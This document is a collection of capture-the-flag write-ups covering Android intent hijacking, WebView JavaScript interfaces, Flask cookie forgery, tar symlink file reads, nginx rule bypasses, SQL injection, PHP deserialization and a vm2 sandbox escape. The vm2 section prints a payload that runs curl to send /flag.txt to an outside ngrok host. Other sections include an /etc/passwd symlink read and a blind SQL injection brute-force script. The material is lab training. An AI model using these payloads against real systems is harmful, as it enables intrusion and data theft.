Mobile: kage

solution We are given in this challenge 2 APKs the main challenge is the sealing version of the apk with the real flag and the second one is the fake version with the fake flag used for testing. The fake version contains a fake flag, but once u get the approach and get the flag you can use the same approach to get the real flag from the sealing app. I got the source code using Jadx. First thing i do usually is looking in AndroidMainfest.xml file. In this challenge the MainActivity is the interesting part and has all what we need to solve the challenge, Let’s look at it. package com.cyctf.kage; import android.content.Intent; import android.os.Bundle; import android.util.Log; import android.widget.ImageView; import android.widget.Toast; import androidx.appcompat.app.AppCompatActivity; /* loaded from: classes3.dex */ public class MainActivity extends AppCompatActivity { /* JADX INFO: Access modifiers changed from: protected */ @Override // androidx.fragment.app.FragmentActivity, androidx.activity.ComponentActivity, androidx.core.app.ComponentActivity, android.app.Activity public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_main); if (getIntent() != null && "Secret_Action".equals(getIntent().getAction())) { Intent intent = new Intent("Tsukuyomi"); try { Toast.makeText(this, "Be Careful, Something was sent to you", 1).show(); startActivityForResult(intent, 1337); return; } catch (Exception e) { e.printStackTrace(); Toast.makeText(this, "No App Can Handle My Shadow!!", 1).show(); return; } } Toast.makeText(this, "Invalid action!.", 1).show(); } @Override // androidx.fragment.app.FragmentActivity, androidx.activity.ComponentActivity, android.app.Activity public void onActivityResult(int i, int i2, Intent intent) { super.onActivityResult(i, i2, intent); ImageView myImageView = (ImageView) findViewById(R.id.imageView); if (intent != null && getIntent() != null && getIntent().getBooleanExtra("Unlock", false) && intent.getIntExtra("RegistrationNumber", -1) == 5192) { myImageView.setImageResource(R.drawable.image); Toast.makeText(this, "Check Logs For Your Reward!!", 1).show(); Log.d("Jester", new String("Cyctf{Fake_Flag_don't_Submit}")); } } } We have onCreate function at which This activity is started by intent whose action is Secret_Action Then if the previous condition is true, a new intent is created whose action is Tsukuyomi and this new intent is used to send the start activity using startActivityForResult(intent, 1337) startActivityForResult(): can start activity and also expects a response from the activity it started, It receives this response through onActivityResult() Note: The response sent by us is sent through setResult(RESULT_OK,intent) We see in the code onActivityResult(int i, int i2, Intent intent) which accepts the response as we said and it sends the flag if the condition (intent != null && getIntent() != null && getIntent().getBooleanExtra("Unlock", false) && intent.getIntExtra("RegistrationNumber", -1) == 5192) is true This condition has intent which is the parameter to onActivityResult() function and it’s sent by us through setResult() function getIntent() which is first intent we used to start this application whose action is Secret_Action So our approach to solve the challenge will be Creating an application which will do the following sending an intent with action: Secret_Action (to trigger the condition in onCreate function) and extra bool data Unlock: true (to trigger the condition in onActivityResult) Intent intent = new Intent("Secret_Action"); intent.setClassName("com.cyctf.kage","com.cyctf.kage.MainActivity"); intent.putExtra("Unlock",true); startActivity(intent); The code above in the MainActivity of the app we created The target’s MainActivity starts and creates an intent whose action: Tsukuyomi and sends it using startActivityForResult(intent, 1337); We will receive it by having an application with intent filter to accept intent whose action: Tsukuyomi <activity android:name=".Hijack" android:exported="true"> <intent-filter> <action android:name="Tsukuyomi" /> <category android:name="android.intent.category.DEFAULT" /> </intent-filter> </activity> Above is the intent filter of the activity we used to receive the intent whose action: Tsukuyomi Note: hijack activity is another activity other than the MainActivity of our app Then after receiving this intent, create an intent with extra Int data RegistrationNumber: 5192 Send this intent using setResult function as response to the target ```java public class Hijack extends AppCompatActivity { @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); EdgeToEdge.enable(this); setContentView(R.layout.activity_hijack); ViewCompat.setOnApplyWindowInsetsListener(findViewById(R.id.main), (v, insets) -> { Insets systemBars = insets.getInsets(WindowInsetsCompat.Type.systemBars()); v.setPadding(systemBars.left, systemBars.top, systemBars.right, systemBars.bottom); return insets; }); Intent resultIntent = new Intent(); resultIntent.putExtra("RegistrationNumber", 5192); setResult(RESULT_OK,resultIntent); finish(); } } ``` This intent will be received by the target through onActivityResult and will trigger the condition to log the flag Watch the logs after running the app. GG, I wish you enjoyed the write up

CTF · 2024-11-03

Mobile: catch it

solution We are given in this challenge 2 APKs the main challenge is the sealing version of the apk with the real flag and the second one is the fake version with the fake flag used for testing. The fake version contains a fake flag, but once u get the approach and get the flag you can use the same approach to get the real flag from the sealing app. I got the source code using Jadx. First thing i do usually is looking in AndroidMainfest.xml file. We have many interesting information here like android:debuggable="true" & android:allowBackup="true" We have 2 activities MainActivity which is exported so we can access it using adb shell or by another app we create AnotherView which isn’t exported (can be accessed by activity within the same app only), It has the category browsable which will move us to think about deep links and webviews Let’s dig into these activities This is the code of MainActivity package com.cyctf.catchit; import android.content.Intent; import android.net.Uri; import android.os.Bundle; import androidx.appcompat.app.AppCompatActivity; /* loaded from: classes3.dex */ public class MainActivity extends AppCompatActivity { /* JADX INFO: Access modifiers changed from: protected */ @Override // androidx.fragment.app.FragmentActivity, androidx.activity.ComponentActivity, androidx.core.app.ComponentActivity, android.app.Activity public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_main); Intent reintent = getIntent(); Uri url = reintent.getData(); if (url != null) { if ("cyshield.com".equals(url.getHost())) { Intent intent = new Intent(); intent.putExtra("url", String.valueOf(url)); intent.setClass(this, AnotherView.class); startActivity(intent); return; } Intent intent2 = new Intent(this, (Class<?>) AnotherView.class); startActivity(intent2); return; } Intent intent3 = new Intent(this, (Class<?>) AnotherView.class); startActivity(intent3); } } When we analyze the code carefully we see that it sends an intent to start AnotherView activity, but the intent contains the Uri whose host is cyshield.com the intent will have an extra string with key: url and value: <output of String.valueOf(url) Let’s look at the source code of AnotheView activity package com.cyctf.catchit; import android.content.Intent; import android.os.Bundle; import android.util.Log; import android.webkit.JavascriptInterface; import android.webkit.WebChromeClient; import android.webkit.WebSettings; import android.webkit.WebView; import android.webkit.WebViewClient; import android.widget.Toast; import androidx.appcompat.app.AppCompatActivity; /* loaded from: classes3.dex */ public class AnotherView extends AppCompatActivity { private WebView webView; /* JADX INFO: Access modifiers changed from: protected */ @Override // androidx.fragment.app.FragmentActivity, androidx.activity.ComponentActivity, androidx.core.app.ComponentActivity, android.app.Activity public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_another_view); this.webView = (WebView) findViewById(R.id.webView); configureWebView(); Intent intent = getIntent(); String url = intent.getStringExtra("url"); if (url != null) { intent.getData(); this.webView.loadUrl(url); } else { this.webView.loadUrl("https://cyshield.com"); } } private void configureWebView() { WebSettings webSettings = this.webView.getSettings(); webSettings.setJavaScriptEnabled(true); webSettings.setSafeBrowsingEnabled(false); this.webView.setWebChromeClient(new WebChromeClient()); this.webView.setWebViewClient(new WebViewClient()); this.webView.addJavascriptInterface(new JavaScriptInterface(), "Jester"); } /* loaded from: classes3.dex */ public class JavaScriptInterface { public JavaScriptInterface() { } @JavascriptInterface public void showFlag() { Toast.makeText(AnotherView.this, "Check Logs For Your Reward!!", 1).show(); Log.d("Jester", new String("CyCtf{Fake_Flag_don't_Sumbit}")); } } } Here we have many interesting things We have a webview (basically you are able to navigate website within the application) The webview has interesting configurations in configureWebView() function setJavaScriptEnabled(true): This enables execution of JS codes which will move us to think of the attacks that involves JS like XSS, etc…. setSafeBrowsingEnabled(false): disables the safe browsing, so the app is object to loading malicious pages (maybe used in another solution but i didn’t use it in my solution actually) addJavascriptInterface(new JavaScriptInterface(), "Jester");: This is JSInterface creation which exposes Java object to JS execution, in this case we can access the class JavaScriptInterface() in Java using Jester object in JS We also have have JavaScriptInterface class whose functions now can be accessed using Jester. It contains showFlag() function, so if we can are able to execute JS code we can trigger this function using Jester.showFlag(), and this is our objective and we will get the flag in the logs. After searching in different sites and asking chatgpt also i found idea If i can load a url (whatever it is) and the debugging is enabled, so i can inspect it using chrome://inspect on my host and access the dev tools. After accessing the devtools i can run Jester.showFlag() in the console. This is out approach and let’s go to see the steps. First we need to access AnotherView activity, we can do this using the command .\adb.exe shell am start-activity -n com.cyctf.catchit/.MainActivity -d https://cyshield.com/ Which will access AnotherView activity and will load https://cyshield.com/. When we go to chrome://inspect on chrome on our host laptop we will see this Click inspect and you will get the devtools, go to console to execute Jester.showFlag() and make sure you are getting the logs using adb.exe logcat and you will get the flag in these logs. Thanks for Reading, I Wish this write up was useful for you.

CTF · 2024-11-03

Web: Slippery Way (Medium)

Solution When we get the files of the challenge we will see this file hierarchy. and this is app.py from flask import Flask, render_template, request, redirect, url_for, session, send_from_directory import os import random import string import time import tarfile from werkzeug.utils import secure_filename app = Flask(__name__) app.secret_key = "V3eRy$3c43T" def otp_generator(): otp = ''.join(random.choices(string.digits, k=4)) return otp if not os.path.exists('uploads'): os.makedirs('uploads') @app.route('/', methods=['GET', 'POST']) def main(): if 'username' not in session or 'valid_otp' not in session: return redirect(url_for('login')) if request.method == 'POST': uploaded_file = request.files['file'] if uploaded_file.filename != '': filename = secure_filename(uploaded_file.filename) file_path = os.path.join('uploads', filename) uploaded_file.save(file_path) session['file_path'] = file_path return redirect(url_for('extract')) else: return render_template('index.html', message='No file selected') return render_template('index.html', message='') @app.route('/extract') def extract(): if 'file_path' not in session: return redirect(url_for('login')) file_path = session['file_path'] output_dir = 'uploads' if not tarfile.is_tarfile(file_path): os.remove(file_path) return render_template('extract.html', message='The uploaded file is not a valid tar archive') with tarfile.open(file_path, 'r') as tar_ref: tar_ref.extractall(output_dir) os.remove(file_path) return render_template('extract.html', files=os.listdir(output_dir)) @app.route('/login', methods=['GET', 'POST']) def login(): if request.method == 'POST': username = request.form['username'] password = request.form['password'] if username == 'admin' and password == 'admin': session['username'] = username return redirect(url_for('otp')) else: return render_template('login.html', message='Invalid username or password') return render_template('login.html', message='') @app.route('/otp', methods=['GET', 'POST']) def otp(): if 'username' not in session: return redirect(url_for('login')) if request.method == 'POST': otp,_otp = otp_generator(),request.form['otp'] if otp in _otp: session['valid_otp'] = True return redirect(url_for('main')) else: time.sleep(10) # please don't bruteforce my OTP return render_template('otp.html', message='Invalid OTP') return render_template('otp.html', message='') @app.route('/logout') def logout(): session.pop('username', None) session.pop('valid_otp', None) session.pop('file_path', None) return redirect(url_for('login')) @app.route('/uploads/<path:filename>') def uploaded_file(filename): uploads_path = os.path.join(app.root_path, 'uploads') return send_from_directory(uploads_path, filename) if __name__ == '__main__': app.run(host='0.0.0.0', port=5000) When we start the challenge we see this login page from the code we will login using admin:admin and we will get forwarded to /otp endpoint We can’t go to anyother endpoint without submiting the valid otp. Trying to brute force or bypass this page through the otp form is a rabbit hole. When we look in the source code we will find interesting things. Each user of course have a cookie This is Flask application which moves us to think about flask-unsign cookie flask-unsign cookie is something like JWT that needs a secret signing key to forge a cookie We already have this secret app.secret_key = "V3eRy$3c43T" when we decode the cookie we will find this {"username": "admin"} from the code that if the otp is validated, then session['valid_otp'] = True So we need to forge a new cookie with username and valid_otp keys we will use flask-unsign ┌──(youssif㉿youssif)-[~] └─$ flask-unsign --sign --cookie "{'username': 'admin','valid_otp': True}" --secret 'V3eRy$3c43T' eyJ1c2VybmFtZSI6ImFkbWluIiwidmFsaWRfb3RwIjp0cnVlfQ.Zvau5g.TioGBeLlSjBfw2V2CwACLyp9MpM When we use the new cookie we can access the other endpoints Now visit / again and you will find this upload page When we go back to upload function in our code we will find that it accepts only tar file And in /extract this uploaded tar got extracted After searching i found this candy From this article we knew that we can get LFI from tar upload function using ┌──(youssif㉿youssif)-[~] └─$ ln -s ../../../../../../../../../etc/passwd kakashi.txt tar -cvf test.tar kakashi.txt We created a symbolic link from kakashi.txt to ../../../../../../../../../etc/passwd Then we put it in the tar file. We will upload the file and when we go to /extract it will give us kakashi.txt open this file and GG you got /etc/passwd you can read the flag as the flag path was leaked in init.sh file. Congratzzzzzzzzzzzzzzz

CTF · 2024-09-27

Web: Coco Elda3eef Revenge (Easy) -- My First Blood --

Solution This challenge is the hard version of coco elda3eef. When we get the files of the challenge we will see this file hierarchy and it’s exactly the same like coco elda3eef easy challenge. We have a web server running by nodeJS and there’s an nginx proxy between the client and the server The server.js code is very simple and the same as the previous challenge. const express = require('express'); const app = express(); const port = 3000; app.get('/', (req, res) => { res.sendfile('index.html'); }); app.get('/internal', (req, res) => { resp = process.env.FLAG || "IEEE{test_flag}" res.send(resp); }); app.listen(port, () => { console.log(`App listening on port ${port}`); }); It’s running on port 3000, and to get the flag you need to visit /internal endpoint. But when we look at nginx.conf and here is the difference worker_processes 1; events { worker_connections 1024; } http { server { listen 80; location ~* ^/internal$ { allow 127.0.0.1; deny all; return 403; } location ~* ^/internal/ { allow 127.0.0.1; deny all; return 403; } location / { proxy_pass http://ghazy-corp:3000; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_set_header X-Forwarded-Proto $scheme; } } } from the code of the proxy we see that if we visit /internal directly we will get 403 forbidden status code. But this can’t be bypassed like the previous challenge because of this so we can’t use /InTernal to bypass it. After searching i found this candy The interesting part is here we have characters that nginx can see it but nodeJS removes it. so we can append this character to /internal so bypassing the nginx rule and it this appended character will be removed by nodeJS resulting in visiting `/internal and getting the flag from the blog we need the character whose hex is A0 so we will change the hex of the appended character to A0. Let’s apply changes and send the request And Congratzzzzzzzzzzzz.

CTF · 2024-09-27

Web: Coco Elda3eef (Easy)

Solution When we get the files of the challenge we will see this file hierarchy. We have a web server running by nodeJS and there’s an nginx proxy between the client and the server The server.js code is very simple const express = require('express'); const app = express(); const port = 3000; app.get('/', (req, res) => { res.sendfile('index.html'); }); app.get('/internal', (req, res) => { resp = process.env.FLAG || "IEEE{test_flag}" res.send(resp); }); app.listen(port, () => { console.log(`App listening on port ${port}`); }); It’s running on port 3000, and to get the flag you need to visit /internal endpoint. But when we look at nginx.conf worker_processes 1; events { worker_connections 1024; } http { server { listen 80; location = /internal { allow 127.0.0.1; deny all; return 403; } location = /internal/ { allow 127.0.0.1; deny all; return 403; } location / { proxy_pass http://ghazy-corp:3000; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_set_header X-Forwarded-Proto $scheme; } } } from the code of the proxy we see that if we visit /internal directly we will get 403 forbidden status code. This can be bypassed easily by visiting /InTernal as example (change the case of any character) And Congratzzzzzzzzzzzz.

CTF · 2024-09-27

Web: unmasked

Description You need to read the flag stored in /flag.txt Solution When we start the challange we will see this login page and register page After examining the register page i tried to register an account with username = admin and i got error as the name is used before The interesting part the i get the query in the response in case of error This response gave me interesting information about the query. We knew it’s INSERT query and we knew how the parameters we provide are put into this query. i created a normal user account and logged in to see the next page and i found an upload page. There’s many interesting notes in this page like The userId The email of the user is reflected in page I tried to upload different files(php files, images, etc) but there’s no way to access them I guessed there’s a directory for uploads at /uploads and this was true but i got status code 403 forbidden Anyway i went back to register and my main goal was to get access on admin’s account I thought i can get access to more resources by getting access on admin’s account. I made sure that username is vulnerable to sqli and from errors I knew it’s MariaDB database. After Thinking and attempts i reached to the idea of using stacked queries in this sequence Insert Update Insert I tried this username=admin1','y@g.c','8870b2ae75733c08f557a6333e1aa7502ca50541');UPDATE+users+SET+password+%3d+'8870b2ae75733c08f557a6333e1aa7502ca50541'+WHERE+username+=+'admin';+INSERT+INTO+users(username,+email,+password)+VALUES+('kakashi2&email=adminqqq%40admin.com&password=admin By using this payload i though i’ll be able to insert a user whose name is admin1 and update the password of admin and insert another user whose name is kakashi2 but i got this error.. Actually, I couldn’t solve it so i tried a different approache which is SSTI in email parameter but also no interesting output. I read the challange again and found that we just need to read /flag.txt After searching i found that there’s a function called LOAD_FILE(file path) in MariaDB here. I used it to load /flag.txt in email parameter and this because email parameter is reflected in the next page so we can see the file in that page. I modified the payload to be this username=admin3',LOAD_FILE('/flag.txt'),'8870b2ae75733c08f557a6333e1aa7502ca50541')#;&email=adminqqq%40admin.com&password=admin Then login using this account AND ….. GG !!!

CTF · 2024-08-03

Web: secure calc

Description This site is secure and sandboxed. Solution When we start the challange we will find the source code which is a NodeJS express site and it’s a small app as you see const express = require("express"); const {VM} = require("vm2"); const app = express(); const vm = new VM(); app.use(express.json()); app.get('/', function (req, res) { return res.send("Hello, just index : )"); }); app.post('/calc',async function (req, res) { let { eqn } = req.body; if (!eqn) { return res.status(400).json({ 'Error': 'Please provide the equation' }); } else if (eqn.match(/[a-zA-Z]/)) { return res.status(400).json({ 'Error': 'Invalid Format' }); } try { result = await vm.run(eqn); res.send(200,result); } catch (e) { console.log(e); return res.status(400).json({ 'Error': 'Syntax error, please check your equation' }); } }); app.listen(3000,'0.0.0.0',function(){ console.log("Started !") }); We see const {VM} = require("vm2");, I searched for it and i knew the version from package.json file attached ith the challange and the version was "vm2": "^3.9.19". It’s vulnerable to sandbox escaping and the poc is in this article. We see that the code executed is passed to vm.run(code) function and we have this function in the code of the challange. When we examine /calc endpoint we see that it’s an endpoint for solving equations and we will find 4 steps: checking if there’s a data in the request body (this data will be in json format) data is passed to regex checker to make sure that the data in the request body doesn’t contain any characters vm.run(code) at which the equation will be solved or our code will be executed and it’s our goal syntax error if there is any error from vm.run(code) I have the CVE POC code so i can escape the sandbox but the problem is in bypassing regex. When i send a normal data without any alphabetical characters i get the result of the equation like this When i try sending any characters i get "Error":"Invalid Format" after many attempts i got an error in the syntax that told me json.parse is used This made me to think about prototype pollution I tried { "__proto__": { "eqn": "1+2" } } but it couldn’t detect that it’s an equation. I tried many encoding algorithms like unicode but didn’t work. After many attempts i found the suitable encoding way it’s JSFuck because it consists of symbols only so it will work I used this payload async function fn() { (function stack() { new Error().stack; stack(); })(); } p = fn(); p.constructor = { [Symbol.species]: class FakePromise { constructor(executor) { executor( (x) => x, (err) => { return err.constructor.constructor('return process')().mainModule.require('child_process').execSync('curl http://ngrokIP:ngrokport'); } ) } } }; p.then(); and converted it to JSFuck using any online converter and send that request The curl command worked well Now let’s read the flag but making the command to be curl -X POST --data-binary "@/flag.txt" http://ngrokIP:port convert it and send the request like we did before AND .. GG !!

CTF · 2024-08-03

Web: real

Description A BBH got a vulnerability in this site but the triager needs POC, The flag will be the db username in UPPERCASE and there’s rate limit (1 request per second) solution When we start the challange we will see this login page It’s a very very simple page and during my first attempts i noticed that the output can be: welcome (status code 200) and this occurs when the login is done successfully error (status code 400) and this occurs when the login is failed (wrong creds or wrong syntax) filtered and this occurs when using symbols or words which are forbidden when i tried username=admin%27--&password=a i got welcome in response like this we got the injection point and i see it’s a blind sqli. I was tring to retrieve the data from the tables but there’s misunderstanding. I thought he wants a different user in the same table but it wants the username of the db which is the user connected to database. and this misunderstanding made me take too much time as i want to get data from users table and the () were filtered, so i was in a rabbit hole. After noticing that we need the db user i starting thinking in a different way. I want to know the type of data base. I noticed that the database accepts -- as comment and refuse # and after asking chatgpt i knew that my database now can be Oracle or Postgresql After searching about differences i found that there’s a table called all_tables in oracle corresponds to information_schema.tables in postgresql. I made sure that the db is postgresql using these parameters username=admin%27union%20select%20null,null%20from%20information_schema.tables--&password=a and got welcome in the response. Now i want to get the postgres dbusername. After searching i found that to get it we use select current_user There may be other ways but this worked with me and was very simple. Now i want to inject it in the username parameter and this can be done by admin' and current_user like 'A%'-- this will return welcome if the first character in the current_user is A. but the problem here is like is filtered, so after asking chatgpt i found an alternative which is admin' and current_user ~ '^A'-- and it has the same functionality. We should run the same query for all possible characters and for the length of the username. I created this script to do this job import requests import time import urllib3 urllib3.disable_warnings() # Base URL and target endpoint url = "https://real.ascwg-challs.app/login" # Headers for the request headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate, br", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://real.ascwg-challs.app", "Referer": "https://real.ascwg-challs.app/", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1", "Priority": "u=0, i", "Te": "trailers" } # Characters to iterate over characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZ{}_0123456789!@#%^&*()-=_+[]{}|;:',.<>?/`~\"\\abcdefghijklmnopqrstuvwxyz" # Base injection point base_injection = "admin'AND CURRENT_USER ~ '^" password = "a" def bruteforce(): # Initialize the discovered prefix prefix = "" # Try to find each character of the username while True: for char in characters: # Replace the placeholder §u§ with the current prefix + char current = prefix + char injection = base_injection+current+'\'--' data = f"username={injection}&password={password}" # Send POST request response = requests.post(url, headers=headers, data=data, verify=False) # Wait for 1 second to respect the rate limit time.sleep(1) # Check for a successful response if response.status_code == 200: prefix += char print(f"Found: {prefix}") break # Move to the next character if __name__ == "__main__": bruteforce() And .. GG !!

CTF · 2024-08-03

Web: PDF Generator

CTF · 2024-06-27

Web: Hidden In Plain Sight

Solution when we start we see a simple login page When i go to /robots.txt i found this User-agent: * Disallow: /s3cr3t_b4ckup when you go to /s3cr3t_b4ckup you will be able to download the source code the code config.php whose content is <?php $valid_username = 'guest'; $valid_password = 'guest@123456'; ?> This is very good i used this credential to login we have also login.php which contains <?php include("config.php"); class User { public $username; private $password; public function __construct($username, $password) { $this->username = $username; $this->password = $password; } } if ($_SERVER['REQUEST_METHOD'] === 'POST') { $username = $_POST['username']; $password = $_POST['password']; if ($username === $valid_username && $password === $valid_password) { $user= new User($username, $password); $cookie_value = base64_encode(serialize($user)); setcookie('login', $cookie_value, time() + 3600, '/'); header('Location: profile.php'); exit(); } else { $error_message = 'Invalid username or password.'; } } ?> The interesting info here that the cookie is formed by calculating base64 of the serialized object of the logged in user. so if we decode out current cookie it becomes O:4:"User":2:{s:8:"username";s:5:"guest";s:14:"Userpassword";s:12:"guest@123456";} It’s corresponding to a user object with the credential we used. for more understanding of how the php serialized object created here in the src code there’s also profile.php which contains <?php include("flag.php"); include("config.php"); include("user.php"); if (isset($_COOKIE['login'])) { $user = unserialize(base64_decode($_COOKIE['login'])); if ($user instanceof User) { if ($user->is_admin()) { $welcome_message= "Welcome, admin! <br> $flag"; } else { $welcome_message= 'Hello, ' . htmlspecialchars($user->username); } } else { header('Location: index.php'); exit(); } } else { header('Location: index.php'); exit(); } ?> from this code we see that the flag will appear if the logged in user is instance of user and is_admin() returns True This function is tested on the cookie after decoding and unserializing the cookie (returning it to object). The last file in src code is user.php whose content is <?php class User { public $username; private $isAdmin = false; private $password; public function __construct($username, $password) { $this->username = $username; $this->password = $password; } public function getPassword() { return $this->password; } public function getUsername() { return $this->username; } public function is_admin() { return $this->isAdmin; } } ?> we see that is_admin() returns True if isAdmin attribute equals True. So our idea here is updating the cookie by adding isAdmin attribute and setting it to True. Note the validation to render the flag is done in isAdmin only, so we don’t need the username, etc … (including them isn’t a problem but i will ignore them xD) So the serialized object here became O:4:"User":1:{s:7:"isAdmin";b:1;} digging the serialized object O: object 4: object name length (needed for parsing) User: object name 1: number of object attributes s: string 7: string's name length isAdmin: string's name b: boolean 1: true encode it and add it in the browser cookie or burp and you will get the flag Congratzzzz

CTF · 2024-06-27

Web: pow (easy)

CTF · 2024-06-23

Web: One Day One Letter (normal)

Description Everything comes to those who wait. Flag Format: FLAG{…} Solution in This challange we have Time server and content server The time server from http import HTTPStatus from http.server import BaseHTTPRequestHandler, HTTPServer import json import time from Crypto.Hash import SHA256 from Crypto.PublicKey import ECC from Crypto.Signature import DSS key = ECC.generate(curve='p256') pubkey = key.public_key().export_key(format='PEM') class HTTPRequestHandler(BaseHTTPRequestHandler): def do_GET(self): if self.path == '/pubkey': self.send_response(HTTPStatus.OK) self.send_header('Content-Type', 'text/plain; charset=utf-8') self.send_header('Access-Control-Allow-Origin', '*') self.end_headers() res_body = pubkey self.wfile.write(res_body.encode('utf-8')) self.requestline else: timestamp = str(int(time.time())-60*60*24).encode('utf-8') h = SHA256.new(timestamp) signer = DSS.new(key, 'fips-186-3') signature = signer.sign(h) self.send_response(HTTPStatus.OK) self.send_header('Content-Type', 'text/json; charset=utf-8') self.send_header('Access-Control-Allow-Origin', '*') self.end_headers() res_body = json.dumps({'timestamp' : timestamp.decode('utf-8'), 'signature': signature.hex()}) self.wfile.write(res_body.encode('utf-8')) handler = HTTPRequestHandler httpd = HTTPServer(('', 5001), handler) httpd.serve_forever() The time server generates the current timestamp and signs with specific ECC key The conent server import json import os from datetime import datetime from http import HTTPStatus from http.server import BaseHTTPRequestHandler, HTTPServer from urllib.request import Request, urlopen from urllib.parse import urljoin from Crypto.Hash import SHA256 from Crypto.PublicKey import ECC from Crypto.Signature import DSS FLAG_CONTENT = os.environ.get('FLAG_CONTENT', 'abcdefghijkl') assert len(FLAG_CONTENT) == 12 assert all(c in 'abcdefghijklmnopqrstuvwxyz' for c in FLAG_CONTENT) def get_pubkey_of_timeserver(timeserver: str): req = Request(urljoin('https://' + timeserver, 'pubkey')) with urlopen(req) as res: key_text = res.read().decode('utf-8') return ECC.import_key(key_text) def get_flag_hint_from_timestamp(timestamp: int): content = ['?'] * 12 idx = timestamp // (60*60*24) % 12 content[idx] = FLAG_CONTENT[idx] return 'FLAG{' + ''.join(content) + '}' class HTTPRequestHandler(BaseHTTPRequestHandler): def do_OPTIONS(self): self.send_response(200, "ok") self.send_header('Access-Control-Allow-Origin', '*') self.send_header('Access-Control-Allow-Methods', 'POST, OPTIONS') self.send_header("Access-Control-Allow-Headers", "X-Requested-With") self.send_header("Access-Control-Allow-Headers", "Content-Type") self.end_headers() def do_POST(self): try: nbytes = int(self.headers.get('content-length')) body = json.loads(self.rfile.read(nbytes).decode('utf-8')) timestamp = body['timestamp'].encode('utf-8') signature = bytes.fromhex(body['signature']) timeserver = body['timeserver'] pubkey = get_pubkey_of_timeserver(timeserver) h = SHA256.new(timestamp) verifier = DSS.new(pubkey, 'fips-186-3') verifier.verify(h, signature) self.send_response(HTTPStatus.OK) self.send_header('Content-Type', 'text/plain; charset=utf-8') self.send_header('Access-Control-Allow-Origin', '*') self.end_headers() dt = datetime.fromtimestamp(int(timestamp)) res_body = f'''<p>Current time is {dt.date()} {dt.time()}.</p> <p>Flag is {get_flag_hint_from_timestamp(int(timestamp))}.</p> <p>You can get only one letter of the flag each day.</p> <p>See you next day.</p> ''' self.wfile.write(res_body.encode('utf-8')) self.requestline except Exception: self.send_response(HTTPStatus.UNAUTHORIZED) self.end_headers() handler = HTTPRequestHandler httpd = HTTPServer(('', 5000), handler) httpd.serve_forever() In the content server when we post the timestamp, signature and time server then it sends request to the timeserver to /pubkey endpoint to get the public key and then it verifies the signature using this key So u don’t need to think about the encrpytion as the content server does its magic alone u just sent him the time server which you will control in the json and he will ask the time server for the key without any problems Steps: run the time server locally run ngroc using ngroc http 5001 we used ngroc because the content server can’t see our local time server so ngroc works as port forwarder in the middle and we used port 5001 as it’s the port we use in the time server and http because it supports https and we need https because the content server has this line req = Request(urljoin('https://' + timeserver, 'pubkey')) and we see that it uses https with the time server you can send get request to get specific timestamp and the signature In the content server we POST the timestamp and signature we got and also the time server will be the ngroc IP as it’s our new time server and it works !! we can now get the whole flag as we control the time server by adding 606024 to the timestamp which equals one day in seconds repeat this until u get the flag: FLAG{lyingthetime} Congratzzzzz

CTF · 2024-06-23

Web: Noscript (normal)

CTF · 2024-06-23

Web: Bad_Worker (beginner)

Description We created a web application that works offline. Flag Format: FLAG{…} Solution When we first open the challange we see this After movement within the site, I found nothing interesting. Then i went to examine the JS files within the site. I found a file named service-worker.js with the content // Caution! Be sure you understand the caveats before publishing an application with // offline support. See https://aka.ms/blazor-offline-considerations self.importScripts('./service-worker-assets.js'); self.addEventListener('install', event => event.waitUntil(onInstall(event))); self.addEventListener('activate', event => event.waitUntil(onActivate(event))); self.addEventListener('fetch', event => event.respondWith(onFetch(event))); const cacheNamePrefix = 'offline-cache-'; const cacheName = `${cacheNamePrefix}${self.assetsManifest.version}`; const offlineAssetsInclude = [ /\.dll$/, /\.pdb$/, /\.wasm/, /\.html/, /\.js$/, /\.json$/, /\.css$/, /\.woff$/, /\.png$/, /\.jpe?g$/, /\.gif$/, /\.ico$/, /\.blat$/, /\.dat$/ ]; const offlineAssetsExclude = [ /^service-worker\.js$/ ]; async function onInstall(event) { //console.info('Service worker: Install'); // Fetch and cache all matching items from the assets manifest const assetsRequests = self.assetsManifest.assets .filter(asset => offlineAssetsInclude.some(pattern => pattern.test(asset.url))) .filter(asset => !offlineAssetsExclude.some(pattern => pattern.test(asset.url))) .map(asset => new Request(asset.url, { integrity: asset.hash, cache: 'no-cache' })); await caches.open(cacheName).then(cache => cache.addAll(assetsRequests)); event.waitUntil(self.skipWaiting()); // すぐにactivateにする } async function onActivate(event) { // Delete unused caches const cacheKeys = await caches.keys(); await Promise.all(cacheKeys .filter(key => key.startsWith(cacheNamePrefix) && key !== cacheName) .map(key => caches.delete(key))); event.waitUntil(self.clients.claim()); // すぐにserviceWorkerを有効にする } async function onFetch(event) { let cachedResponse = null; if (event.request.method === 'GET') { const shouldServeIndexHtml = event.request.mode === 'navigate'; let request = event.request; if (request.url.toString().includes("FLAG.txt")) { request = "DUMMY.txt"; } if (shouldServeIndexHtml) { request = "index.html" } return fetch(request); } return cachedResponse || fetch(event.request); } /* Manifest version: Rq/NTVa4 */ So We need to send a GET request to /FLAG.txt endpoint and we will get the flag Congratzzzzzzzzzzzzzzz

CTF · 2024-06-23

Owasp Juice Shop

CTF · 2024-04-24

API testing: challange 3

